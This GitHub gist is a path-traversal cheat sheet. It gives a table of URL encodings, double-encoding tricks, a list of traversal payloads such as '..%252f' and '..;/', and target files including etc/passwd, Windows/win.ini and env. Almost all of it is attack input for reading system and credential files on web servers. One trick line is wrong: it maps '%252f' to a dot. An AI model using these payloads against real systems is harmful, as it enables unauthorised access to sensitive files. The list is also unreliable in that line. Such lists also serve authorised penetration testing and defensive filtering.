Last active
October 11, 2022 01:08
-
-
Save felipecaon/c092959d381dd5b61d91bae182bdacdc to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Char | Encoded | | |
| --- | --- | | |
| space | %20 | | |
| / | %2f | | |
| \ | %5c | | |
| % | %25 | | |
| . | %2e | | |
| f | %66 | | |
| e | %65 | | |
## Tricks | |
%252%66 -> %2f -> / | |
%252%65 -> %2e -> . | |
%252f -> %2f -> / | |
%252f -> %2e -> . | |
## Payloads | |
..;/ | |
..%5c | |
..%2f | |
../ | |
..\ | |
..%252f | |
%2e%2e%252f | |
/ | |
// | |
/// | |
//// | |
///// | |
////// | |
/////// | |
//////// | |
///////// | |
////////// | |
## Files | |
env | |
etc/passwd | |
Windows/win.ini |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment